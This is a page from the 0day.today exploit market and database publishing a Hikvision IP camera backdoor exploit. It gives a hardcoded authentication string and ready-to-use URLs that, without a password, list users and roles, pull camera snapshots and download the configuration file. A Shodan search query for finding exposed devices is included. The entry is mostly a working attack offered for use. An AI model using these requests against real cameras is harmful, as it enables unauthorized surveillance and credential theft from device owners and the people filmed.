[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Hikvision IP Camera - Backdoor Vulnerability

Author
Sobhan Mahmoodi
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-37494
Category
remote exploits
Date add
16-03-2022
Platform
hardware
# Exploit Title: Hikvision IP Camera - Backdoor
# Exploit Author: Sobhan Mahmoodi
# Reference: https://ipvm.com/reports/hik-exploit
# GitHub: https://github.com/bp2008/HikPasswordHelper/

Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK)

# Proof of Concept:

Retrieve a list of all users and their roles:
- http://camera.ip/Security/users?auth=YWRtaW46MTEK

Obtain a camera snapshot without authentication:
- http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

Download camera configuration:
- http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

Shodan link to monitor :
https://www.shodan.io/search?query=%22App-webs%22+%22200+OK%22

#  0day.today [2024-11-15]  #